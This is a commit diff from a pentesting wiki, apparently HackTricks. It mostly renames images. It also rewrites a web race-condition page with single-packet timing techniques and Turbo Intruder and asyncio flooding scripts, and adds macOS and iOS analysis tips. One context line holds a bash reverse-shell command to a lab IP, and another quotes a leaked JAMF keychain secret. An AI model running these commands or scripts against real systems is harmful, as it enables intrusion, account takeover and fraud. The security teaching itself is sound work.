GITBOOK-4034: change request with no subject merged in GitBook
BIN
.gitbook/assets/image (1) (1) (1) (4).png
Normal file
After Width: | Height: | Size: 447 KiB |
Before Width: | Height: | Size: 447 KiB After Width: | Height: | Size: 16 KiB |
Before Width: | Height: | Size: 16 KiB After Width: | Height: | Size: 132 KiB |
Before Width: | Height: | Size: 132 KiB After Width: | Height: | Size: 20 KiB |
BIN
.gitbook/assets/image (15).png
Normal file
After Width: | Height: | Size: 90 KiB |
Before Width: | Height: | Size: 94 KiB After Width: | Height: | Size: 199 KiB |
Before Width: | Height: | Size: 199 KiB After Width: | Height: | Size: 145 KiB |
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 1.2 MiB |
Before Width: | Height: | Size: 1.2 MiB After Width: | Height: | Size: 100 KiB |
BIN
.gitbook/assets/image (3) (1) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 39 KiB |
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 78 KiB |
Before Width: | Height: | Size: 78 KiB After Width: | Height: | Size: 38 KiB |
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 795 KiB |
Before Width: | Height: | Size: 795 KiB After Width: | Height: | Size: 104 KiB |
Before Width: | Height: | Size: 104 KiB After Width: | Height: | Size: 18 KiB |
|
@ -99,7 +99,7 @@ Open the SalseoLoader project using Visual Studio.
|
|||
|
||||
### Add before the main function: \[DllExport]
|
||||
|
||||
![](<../.gitbook/assets/image (2) (1) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (2) (1) (1) (1) (1).png>)
|
||||
|
||||
### Install DllExport for this project
|
||||
|
||||
|
|
|
@ -53,7 +53,7 @@ Moreover, after finding proper credentials you could be able to brute-force othe
|
|||
|
||||
#### JAMF device Authentication
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
|
||||
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Extensiones de Kernel de macOS
|
||||
# macOS Kernel Extensions
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -22,7 +22,7 @@ Obviamente, esto es tan poderoso que es complicado cargar una extensión de kern
|
|||
|
||||
* Al entrar en **modo de recuperación**, las extensiones de kernel deben estar **permitidas para ser cargadas**:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* La extensión de kernel debe estar **firmada con un certificado de firma de código de kernel**, que solo puede ser otorgado por **Apple**. Quien revisará en detalle la **empresa** y las **razones** por las que se necesita.
|
||||
* La extensión de kernel también debe estar **notarizada**, Apple podrá verificarla en busca de malware.
|
||||
|
@ -35,11 +35,17 @@ Obviamente, esto es tan poderoso que es complicado cargar una extensión de kern
|
|||
En Catalina era así: Es interesante destacar que el proceso de **verificación** ocurre en **userland**. Sin embargo, solo las aplicaciones con la concesión **`com.apple.private.security.kext-management`** pueden **solicitar al kernel** que **cargue una extensión:** kextcache, kextload, kextutil, kextd, syspolicyd
|
||||
|
||||
1. **`kextutil`** cli **inicia** el proceso de verificación para cargar una extensión
|
||||
|
||||
* Hablará con **`kextd`** enviando usando un servicio Mach
|
||||
|
||||
2. **`kextd`** comprobará varias cosas, como la firma
|
||||
|
||||
* Hablará con **`syspolicyd`** para comprobar si se puede cargar la extensión
|
||||
|
||||
3. **`syspolicyd`** **preguntará** al **usuario** si la extensión no se ha cargado previamente
|
||||
|
||||
* **`syspolicyd`** indicará el resultado a **`kextd`**
|
||||
|
||||
4. **`kextd`** finalmente podrá indicar al **kernel que cargue la extensión**
|
||||
|
||||
Si kextd no está disponible, kextutil puede realizar las mismas comprobaciones.
|
||||
|
|
|
@ -288,6 +288,12 @@ sudo dtrace -s syscalls_info.d -c "cat /etc/hosts"
|
|||
|
||||
[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events.
|
||||
|
||||
### Apple Instruments
|
||||
|
||||
[**Apple Instruments**](https://developer.apple.com/library/archive/documentation/Performance/Conceptual/CellularBestPractices/Appendix/Appendix.html) are part of Xcode’s Developer tools – used for monitoring application performance, identifying memory leaks and tracking filesystem activity.
|
||||
|
||||
![](<../../../.gitbook/assets/image (15).png>)
|
||||
|
||||
### fs\_usage
|
||||
|
||||
Allows to follow actions performed by processes:
|
||||
|
@ -317,6 +323,10 @@ lldb -n malware.bin
|
|||
lldb -n malware.bin --waitfor
|
||||
```
|
||||
|
||||
{% hint style="warning" %}
|
||||
Inside lldb, dump a process with `process save-core`
|
||||
{% endhint %}
|
||||
|
||||
| **(lldb) Command** | **Description** |
|
||||
| ----------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **run (r)** | Starting execution, which will continue unabated until a breakpoint is hit or the process terminates. |
|
||||
|
|
|
@ -203,7 +203,7 @@ Example of **section header**:
|
|||
|
||||
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
It's also possible to get **headers information** from the **command line** with:
|
||||
|
||||
|
|
|
@ -21,7 +21,7 @@ It creates a 2 of names pipes per .Net process in [dbgtransportsession.cpp#L127]
|
|||
|
||||
So, if you go to the users **`$TMPDIR`** you will be able to find **debugging fifos** you could use to debug .Net applications:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
The function [**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) will handle the communication from a debugger.
|
||||
|
||||
|
|
|
@ -1,23 +1,18 @@
|
|||
|
||||
# Frida Configuration in iOS
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# Installing Frida
|
||||
## Installing Frida
|
||||
|
||||
Go to **Cydia** app and add Frida’s repository by going to **Manage -> Sources -> Edit -> Add** and enter [**https://build.frida.re** ](https://build.frida.re). It will add a new source in the source list. Go to the **frida** **source**, now you should **install** the **Frida** package.
|
||||
|
||||
|
@ -25,21 +20,18 @@ Go to **Cydia** app and add Frida’s repository by going to **Manage -> Sources
|
|||
|
||||
After installed, you can use in your PC the command `frida-ls-devices` and check that the device appears (your PC needs to be able to access it). Execute also `frida-ps -Uia` to check the running processes of the phone.
|
||||
|
||||
## Frida without Jailbroken device & without patching the app
|
||||
|
||||
Check this blog post about how to use Frida in non-jailbroken devices without patching the app: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -18,7 +18,7 @@ Xamarin is an open-source platform that gives developers access to a comprehensi
|
|||
|
||||
### Xamarin Android Architecture 
|
||||
|
||||
<figure><img src="../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Xamarin offers .NET bindings to Android.\* and Java.\* namespaces. Xamarin.
|
||||
|
||||
|
@ -36,7 +36,7 @@ It runs along with the Objective-C Runtime. The runtime environments run on top
|
|||
|
||||
The below-given diagram depicts this architecture:
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### What is .Net Runtime and Mono Framework?
|
||||
|
||||
|
@ -72,7 +72,7 @@ If you encounter a Full AOT compiled application, and if the IL Assembly files a
|
|||
|
||||
Just **unzip the apk/ipa** file and copy all the files present under the assemblies directory:
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
In case of Android **APKs these dll files are compressed** and cannot be directly used for decompilation. Luckily there are tools out there that we can use to **uncompress these dll files** like [XamAsmUnZ](https://github.com/cihansol/XamAsmUnZ) and [xamarin-decompress](https://github.com/NickstaDB/xamarin-decompress).
|
||||
|
||||
|
@ -84,7 +84,7 @@ In the case of the iOS, **dll files inside the IPA files can be directly loaded*
|
|||
|
||||
**Most of the application code can be found when we decompile the dll files.** Also note that Xamarin Framework based apps contain 90% of common code in the builds of all platforms like iOS and Android etc. 
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
From the above screenshot of listing the dll files that were present in the apk, we can confirm that it is a Xamarin app. It contains app-specific dll files along with the library files that are required for the app to run, such as `Xamarin.Essentails.dll` or `Mono.Security.dll` .
|
||||
|
||||
|
|
|
@ -40,7 +40,7 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
|||
* Save changes
|
||||
* Get the generated WebHook URL:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
* Call it with curl and you shuold receive the rev shell
|
||||
|
||||
|
|
|
@ -15,54 +15,70 @@ Get Access Today:
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Anything limited by a number of attempts
|
||||
## Exploiting RC
|
||||
|
||||
Race conditions are **vulnerabilities** that **appear** in webs that **limit the number of times you can perform an action**. A very easy example can be found in [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43).
|
||||
The main problem of abusing RC's is that you need the requests to be processed in parallel with a very short time difference(usually >1ms). In the following section, different solutions are proposed for making this possible.
|
||||
|
||||
## Using several times a one-time use code
|
||||
<figure><img src="../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
When you make the web page perform some **action** that **should be done only once**, but if the action is done **several times** you will be **benefited**, you really need to try a **Race condicion**.\
|
||||
Most of the time this is directly related with **money** (if an action is made you get X money, so let's try to make it several time very quickly)**.**
|
||||
### Single-packet attack
|
||||
|
||||
### **Using from the same account the same code several times**
|
||||
HTTP2 allows to send **2 requests in a single TCP connetion** (whereas in HTTP/1.1 they have to be sequential).\
|
||||
The use of a single TCP packet completely **eliminates the effect of network jitter**, so this clearly has potential for race condition attacks too. However, **two requests isn't enough for a reliable race attack** thanks to **server-side jitter** - variations in the application's request-processing time caused by uncontrollable variables like CPU contention.
|
||||
|
||||
For example, in [**this bug** ](https://hackerone.com/reports/759247)the hunter was able to **load the money inside a gift card several times.**
|
||||
But, using HTTP/1.1 '**last-byte sync**' technique it's possible to pre-send the bulk of the data withholding a tiny fragment from each request and then 'complete' **20-30 requests with a single TCP packet**.
|
||||
|
||||
This is the **turbo intruder** script used to **test** the **race condition** of the mentioned writeup:
|
||||
To **pre-send the bulk of each request**:
|
||||
|
||||
```python
|
||||
def queueRequests(target, wordlists):
|
||||
engine = RequestEngine(endpoint=target.endpoint,
|
||||
concurrentConnections=30,
|
||||
requestsPerConnection=30,
|
||||
pipeline=False
|
||||
)
|
||||
* If the request has no body, send all the headers, but don't set the END\_STREAM flag. Withhold an empty data frame with END\_STREAM set.
|
||||
* If the request has a body, send the headers and all the body data except the final byte. Withhold a data frame containing the final byte.
|
||||
|
||||
for i in range(30):
|
||||
engine.queue(target.req, i)
|
||||
engine.queue(target.req, target.baseInput, gate='race1')
|
||||
Next, **prepare to send the final frames**:
|
||||
|
||||
* Wait for 100ms to ensure the initial frames have been sent.
|
||||
* Ensure TCP\_NODELAY is disabled - it's crucial that Nagle's algorithm batches the final frames.
|
||||
* Send a ping packet to warm the local connection. If you don't do this, the OS network stack will place the first final-frame in a separate packet.
|
||||
|
||||
Finally, send the withheld frames. You should be able to verify that they landed in a single packet using Wireshark.
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that It **doesn't work for static files** on certain servers but as static files aren't relevant to race condition attacks. But static files are irrelevant for RC attacks.
|
||||
{% endhint %}
|
||||
|
||||
Using this technique, you can make 20-30 requests arrive at the server simultaneously - regardless of network jitter:
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Adapting to the target architecture**
|
||||
|
||||
It's worth noting that many applications sit behind a front-end server, and these may decide to forward some requests over existing connections to the back-end, and to create fresh connections for others.
|
||||
|
||||
As a result, it's important not to attribute inconsistent request timing to application behavior such as locking mechanisms that only allow a single thread to access a resource at once. Also, front-end request routing is often done on a per-connection basis, so you may be able to smooth request timing by performing server-side connection warming - **sending a few inconsequential requests down your connection before performing the attack**.
|
||||
|
||||
Note that **PHP locks on the sessionid by default**, so you need to use a **separate session for every request** in your batch or they'll get processed sequentially.
|
||||
|
||||
{% hint style="warning" %}
|
||||
For more information about this technique check the original report in [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
|
||||
{% endhint %}
|
||||
|
||||
#### Examples
|
||||
|
||||
You can check a simple example on how to use this in turbo intruder in [https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py).
|
||||
|
||||
It's also available in **Repeater** via the new '**Send group in parallel**' option in Burp Suite.
|
||||
|
||||
|
||||
engine.start(timeout=5)
|
||||
engine.openGate('race1')
|
||||
|
||||
engine.complete(timeout=60)
|
||||
### Raw BF
|
||||
|
||||
Before the previous research these were some payloads used which just tried to send the packets as fast as possible to cause a RC.
|
||||
|
||||
def handleResponse(req, interesting):
|
||||
table.add(req)
|
||||
```
|
||||
|
||||
Using also BURP you could also send the **request** to **Intruder**, set the **number of threads** to **30** inside the **Options menu and,** select as payload **Null payloads** and generate **30.**
|
||||
|
||||
### **Using the same code from different accounts**
|
||||
|
||||
**If the previously proposal didn't work (try to use the same code several times from the same account) you try a variant:Try t use the same code from different accounts:**
|
||||
* **Turbo Intruder**
|
||||
|
||||
```python
|
||||
def queueRequests(target, wordlists):
|
||||
|
@ -83,7 +99,7 @@ def handleResponse(req, interesting):
|
|||
table.add(req)
|
||||
```
|
||||
|
||||
### Using Python
|
||||
* **Python - asyncio**
|
||||
|
||||
```python
|
||||
import asyncio
|
||||
|
@ -113,7 +129,69 @@ async def main():
|
|||
asyncio.run(main())
|
||||
```
|
||||
|
||||
## OAuth2 eternal persistence
|
||||
* **Intruder**: Send the **request** to **Intruder**, set the **number of threads** to **30** inside the **Options menu and,** select as payload **Null payloads** and generate **30.**
|
||||
|
||||
## **RC Methodology**
|
||||
|
||||
|
||||
|
||||
## **RC Impacts**
|
||||
|
||||
### Limit-overrun
|
||||
|
||||
This is the most basic type of race condition where **vulnerabilities** that **appear** in places that **limit the number of times you can perform an action**. Like using the same discount code in a web store several times. A very easy example can be found in [**this report**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43) or in [**this bug**](https://hackerone.com/reports/759247)**.**
|
||||
|
||||
### **Hidden substates**
|
||||
|
||||
Other most complicated RC will exploit **substates in the machine state** that could allow an attacker to **abuse** states he was **never meant to have access** to but there is a **small window** for the attacker to access it.
|
||||
|
||||
1. **Predict potential hidden & interesting substates**
|
||||
|
||||
The first step is to identify all the endpoints that either write to it, or read data from it and then use that data for something important. For example, users might be stored in a database table that is modified by registration, profile-edits, password reset initiation, and password reset completion.
|
||||
|
||||
We can use three key questions to rule out endpoints that are unlikely to cause collisions. For each object and the associated endpoints, ask:
|
||||
|
||||
**1) How is the state stored?**
|
||||
|
||||
Data that's stored in a persistent server-side data structure is ideal for exploitation. Some endpoints store their state entirely client-side, such as password resets that work by emailing a JWT - these can be safely skipped.
|
||||
|
||||
Applications will often store some state in the user session. These are often somewhat protected against sub-states - more on that later.
|
||||
|
||||
**2) Are we editing or appending?**
|
||||
|
||||
Operations that edit existing data (such as changing an account's primary email address) have ample collision potential, whereas actions that simply append to existing data (such as adding an additional email address) are unlikely to be vulnerable to anything other than limit-overrun attacks.
|
||||
|
||||
**3) What's the operation keyed on?**
|
||||
|
||||
Most endpoints operate on a specific record, which is looked up using a 'key', such as a username, password reset token, or filename. For a successful attack, we need two operations that use the same key. For example, picture two plausible password reset implementations:
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
2. **Probe for clues**
|
||||
|
||||
At this point it's time to **launch some RCs attacks** over the potential interesting endpoints to try to find unexpected results compare to the regular ones. **Any deviation from the expected response** such as a change in one or more responses, or a second-order effect like different email contents or a visible change in your session could be a clue indicating something is wrong.
|
||||
|
||||
3. **Prove the concept**
|
||||
|
||||
The final step is to **prove the concept and turn it into a viable attack**.
|
||||
|
||||
When you send a batch of requests, you may find that an early request pair triggers a vulnerable end-state, but later requests overwrite/invalidate it and the final state is unexploitable. In this scenario, you'll want to eliminate all unnecessary requests - two should be sufficient for exploiting most vulnerabilities. However, dropping to two requests will make the attack more timing-sensitive, so you may need to retry the attack multiple times or automate it.
|
||||
|
||||
## Hidden substates case studies
|
||||
|
||||
### Pay & add an Item
|
||||
|
||||
[**Check this lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) to see how to **pay** in a store and **add an extra** item you that **won't need to pay for it**.
|
||||
|
||||
### Confirm other emails
|
||||
|
||||
The idea is to **verify an email address and change it at the same time** to find out if the platform verifies the new one changed.
|
||||
|
||||
### Change email to 2 emails addresses
|
||||
|
||||
According to [**this writeup**](https://portswigger.net/research/smashing-the-state-machine) Gitlab was vulnerable to a takeover this way because it might **send** the **email verification token of one email to the other email**.
|
||||
|
||||
### OAuth2 eternal persistence
|
||||
|
||||
There are several [**OAUth providers**](https://en.wikipedia.org/wiki/List\_of\_OAuth\_providers). Theses services will allow you to create an application and authenticate users that the provider has registered. In order to do so, the **client** will need to **permit your application** to access some of their data inside of the **OAUth provider**.\
|
||||
So, until here just a common login with google/linkdin/github... where you are prompted with a page saying: "_Application \<InsertCoolName> wants to access you information, do you want to allow it?_"
|
||||
|
@ -131,6 +209,7 @@ Once you have **obtained a valid RT** you could try to **abuse it to generate se
|
|||
* [https://hackerone.com/reports/759247](https://hackerone.com/reports/759247)
|
||||
* [https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html](https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html)
|
||||
* [https://hackerone.com/reports/55140](https://hackerone.com/reports/55140)
|
||||
* [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -139,8 +218,8 @@ Once you have **obtained a valid RT** you could try to **abuse it to generate se
|
|||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
|
|
@ -85,6 +85,8 @@ spoofed.burpcollaborator.net = 127.0.0.1
|
|||
|
||||
![](<../../.gitbook/assets/image (649) (1) (1).png>)
|
||||
|
||||
The **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implements IP formatting bypasses.
|
||||
|
||||
### Domain Parser
|
||||
|
||||
```bash
|
||||
|
|
|
@ -31,7 +31,7 @@ In the Burp's builtin browser go to the **Burp extension** and enable it:
|
|||
|
||||
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Inject a Canary
|
||||
|
||||
|
|